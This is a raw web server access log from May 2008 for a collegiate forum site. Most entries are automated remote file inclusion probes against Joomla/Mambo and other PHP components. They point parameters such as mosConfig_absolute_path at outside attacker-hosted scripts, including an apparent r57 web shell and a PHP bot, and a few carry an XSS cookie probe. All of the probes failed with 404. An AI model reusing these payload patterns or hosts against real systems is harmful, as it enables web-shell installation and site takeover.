58.26.137.64 - - [11/May/2008:18:18:07 -0700] "GET //config/dbutil.bck.php?confdir=http://www.bidlux.com/logo/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:18:13 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
72.29.81.233 - - [11/May/2008:18:18:26 -0700] "GET /logs/index.php4?lang=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
72.29.81.233 - - [11/May/2008:18:18:28 -0700] "GET /index.php4?lang=ftp://194.177.97.246/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
59.22.140.17 - - [11/May/2008:18:19:05 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:19:51 -0700] "GET /modulesxoopsgalleryupgrade_album.php?GALLERY_BASEDIR=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:19:51 -0700] "GET /modulesxoopsgalleryupgrade_album.php?GALLERY_BASEDIR=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:20:30 -0700] "GET /logs/access_080204.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:20:32 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:20:33 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:21:14 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:21:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:21:18 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:21:19 -0700] "GET /logs/access_080324.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:36 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:37 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:38 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:45 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:45 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:45 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:47 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:47 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:47 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:56 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:56 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:21:56 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:22:24 -0700] "GET /logs/access.log/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:22:24 -0700] "GET /home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:22:25 -0700] "GET /logs/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:23:09 -0700] "GET /logs/access_080324.log/home.php?pagina=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:26:02 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:26:02 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:26:02 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
83.19.144.26 - - [11/May/2008:18:28:16 -0700] "GET /logs/access_080324.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:28:24 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:28:37 -0700] "GET /logs/home.php?pagina=http://www.darklegions.net/idilegal.txt??http://www.warteam.xpg.com.br/phpbots/pBOT.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:28:37 -0700] "GET /home.php?pagina=http://www.darklegions.net/idilegal.txt??http://www.warteam.xpg.com.br/phpbots/pBOT.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
189.24.245.102 - - [11/May/2008:18:29:20 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
189.24.245.102 - - [11/May/2008:18:29:20 -0700] "GET //config/dbutil.bck.php?confdir=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:30:06 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:31:30 -0700] "GET /logs/scripts.log/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:31:31 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:31:31 -0700] "GET /logs/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:31:55 -0700] "GET /logs/access.log/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:31:59 -0700] "GET /logs/access_080204.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:32:00 -0700] "GET /logs/access_080204.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:32:10 -0700] "GET /logs/access_080204.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:33:35 -0700] "GET /logs/index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:33:35 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:35:03 -0700] "GET /index.php3?p=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.7.193.54 - - [11/May/2008:18:35:04 -0700] "GET /logs/access_080107.log//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.7.193.54 - - [11/May/2008:18:35:04 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
66.7.193.54 - - [11/May/2008:18:35:04 -0700] "GET /logs//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs/access_080303.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs/access_080303.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs/access_080211.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:35:59 -0700] "GET /logs/access_080211.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:36:26 -0700] "GET /logs/access_080303.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:36:26 -0700] "GET //db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:36:26 -0700] "GET /logs//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
207.58.179.218 - - [11/May/2008:18:36:26 -0700] "GET /logs/access_080211.log//db.php?path_local=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:36:33 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:36:33 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:36:33 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:37:20 -0700] "GET /logs/access_071224.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:37:20 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
70.86.229.242 - - [11/May/2008:18:39:02 -0700] "GET /logs/access_080107.log//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
70.86.229.242 - - [11/May/2008:18:39:02 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
70.86.229.242 - - [11/May/2008:18:39:03 -0700] "GET /logs//index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:39:52 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:39:54 -0700] "GET /logs/access_071224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
205.234.213.67 - - [11/May/2008:18:39:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:41:25 -0700] "GET /logs/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:41:25 -0700] "GET /logs/main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:41:26 -0700] "GET /main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
67.205.67.241 - - [11/May/2008:18:41:26 -0700] "GET /main.php3?act=ftp://194.177.97.246/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
88.84.149.101 - - [11/May/2008:18:42:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.149.101 - - [11/May/2008:18:42:25 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
74.6.17.172 - - [11/May/2008:18:44:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.23.102 - - [11/May/2008:18:44:27 -0700] "GET /commentaries/politics/ HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:48 -0700] "GET /logs/access_071217.log//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:48 -0700] "GET /logs/access_071217.log/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:49 -0700] "GET //ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:49 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:49 -0700] "GET /logs//ossim/session/login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
85.17.199.39 - - [11/May/2008:18:47:49 -0700] "GET /logs/errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.149.101 - - [11/May/2008:18:51:12 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
88.84.149.101 - - [11/May/2008:18:51:12 -0700] "GET /errors.php?error=http://n31.dual-srv.de/kunde/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:51:41 -0700] "GET /logs/access.log/contenido.php?sec=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:51:41 -0700] "GET /contenido.php?sec=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
121.254.129.70 - - [11/May/2008:18:51:42 -0700] "GET /logs/contenido.php?sec=http://www.darklegions.net/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
85.114.137.165 - - [11/May/2008:18:52:11 -0700] "GET /logs/access_080324.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.stjohnucc.com//sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.7.193.54 - - [11/May/2008:18:52:34 -0700] "GET //index2.php?option=com_joomlaboard&task=§ionid=&id=&mosConfig_absolute_path=http://82.146.53.155/~paulus/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
203.162.2.134 - - [11/May/2008:18:53:55 -0700] "GET /Jonathan_Fantini_Porter/index.php HTTP/1.0" 200 23858 "http://www.collegiateforum.org/Jonathan_Fantini_Porter/index.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.1) Gecko/20060118 Camino/1.0b2+" "www.collegiateforum.org"
203.162.2.134 - - [11/May/2008:18:54:17 -0700] "GET / HTTP/1.0" 200 918 "http://www.collegiateforum.org/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.1) Gecko/20060118 Camino/1.0b2+" "www.collegiateforum.org"
203.162.2.134 - - [11/May/2008:18:54:18 -0700] "GET /staff HTTP/1.0" 404 275 "http://www.collegiateforum.org/staff" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.1) Gecko/20060118 Camino/1.0b2+" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:20 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
203.162.2.134 - - [11/May/2008:18:54:20 -0700] "GET //www.collegiateforum.org/staff HTTP/1.0" 404 275 "http://www.collegiateforum.org//www.collegiateforum.org/staff" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.1) Gecko/20060118 Camino/1.0b2+" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:20 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:24 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:24 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:24 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
203.162.2.134 - - [11/May/2008:18:54:25 -0700] "GET //www.collegiateforum.org//www.collegiateforum.org/staff HTTP/1.0" 404 275 "http://www.collegiateforum.org//www.collegiateforum.org//www.collegiateforum.org/staff" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.1) Gecko/20060118 Camino/1.0b2+" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:28 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:28 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:31 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:31 -0700] "GET //skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
168.176.162.45 - - [11/May/2008:18:54:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:18:54:49 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
62.75.184.206 - - [11/May/2008:18:54:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
